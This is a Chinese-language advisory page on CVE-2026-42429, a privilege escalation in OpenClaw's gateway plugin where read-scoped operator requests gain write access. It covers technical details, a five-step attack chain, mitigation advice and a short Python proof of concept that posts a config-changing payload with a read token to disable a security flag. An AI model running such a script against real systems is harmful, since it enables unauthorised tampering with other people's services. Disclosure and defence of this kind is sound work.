CVE-2026-42429 CVSS 7.1 高危

CVE-2026-42429 OpenClaw权限提升漏洞

披露日期: 2026-04-28

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-42429

漏洞类型

权限提升

CVSS评分

7.1 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

OpenClaw

漏洞概述

OpenClaw在2026.4.8之前的版本中存在一个严重的权限提升漏洞。该漏洞源于网关插件HTTP身份验证机制的设计缺陷，导致带有身份的操作员读取请求被错误地扩展为运行时操作员写入权限。攻击者无需用户交互，只需通过网络发送读取范围的请求，即可利用此漏洞获得对运行时操作的非授权写入访问权限，从而破坏系统完整性。

技术细节

该漏洞的核心技术问题在于OpenClaw网关插件HTTP身份验证机制中的权限边界控制失效。在受影响的版本（2026.4.8之前）中，系统处理带有特定操作员身份标记的请求时，未能严格区分读取与写入操作的有效权限范围。具体而言，当网关接收到标记为“operator.read”的请求时，底层的身份验证层错误地将该请求的权限上下文扩展或映射到了“operator.write”。这种权限提升是隐式的，发生在运行时请求处理阶段。攻击者只需拥有低权限账户（PR:L），即可通过网络向网关认证端点发送特制的读取请求。由于系统不需要用户交互（UI:N）且攻击复杂度低（AC:L），攻击者能够轻易利用此逻辑缺陷，获得对运行时配置或操作的非授权写入访问权限，从而篡改系统关键数据或破坏服务完整性。

攻击链分析

STEP 1

侦察

攻击者识别目标网络上运行的OpenClaw实例，并确定其版本低于2026.4.8。

STEP 2

获取凭证

攻击者获取一个有效的低权限用户账户凭证，该账户仅具有operator.read（读取）权限。

STEP 3

构造请求

攻击者利用该凭证构造一个特制的HTTP请求，该请求在逻辑上应为读取操作，但实际上包含修改运行时配置的意图。

STEP 4

权限提升

将请求发送至网关认证路由。由于漏洞存在，系统错误地将读取权限扩展为写入权限。

STEP 5

执行写入

攻击者成功执行未经授权的运行时写入操作，修改系统配置或破坏服务完整性。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL for the OpenClaw gateway API
target_url = "http://target-openclaw-instance/gateway/api/runtime"

# Headers with a low-privilege token (operator.read scope)
# The vulnerability allows this token to perform write operations
headers = {
    "Authorization": "Bearer <operator_read_token>",
    "Content-Type": "application/json"
}

# Malicious payload attempting a write operation
# Exploiting the logic flaw where read requests are widened to write permissions
payload = {
    "action": "modify_runtime_config",
    "parameters": {
        "setting_key": "critical_security_flag",
        "new_value": "disabled"
    }
}

try:
    # Sending the request
    response = requests.post(target_url, json=payload, headers=headers)

    if response.status_code == 200:
        print("[+] Exploit successful! Write access granted via read scope.")
        print("[+] Response:", response.text)
    else:
        print("[-] Exploit failed or patch applied.")
        print("[-] Status Code:", response.status_code)

except Exception as e:
    print("[!] Error during exploit execution:", str(e))

影响范围

OpenClaw < 2026.4.8

防御指南

临时缓解措施

如果无法立即升级，建议暂时禁用受影响的网关插件HTTP认证功能，或通过防火墙规则严格限制对网关路由的网络访问，仅允许受信任的管理员IP地址进行连接，以降低被攻击的风险。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表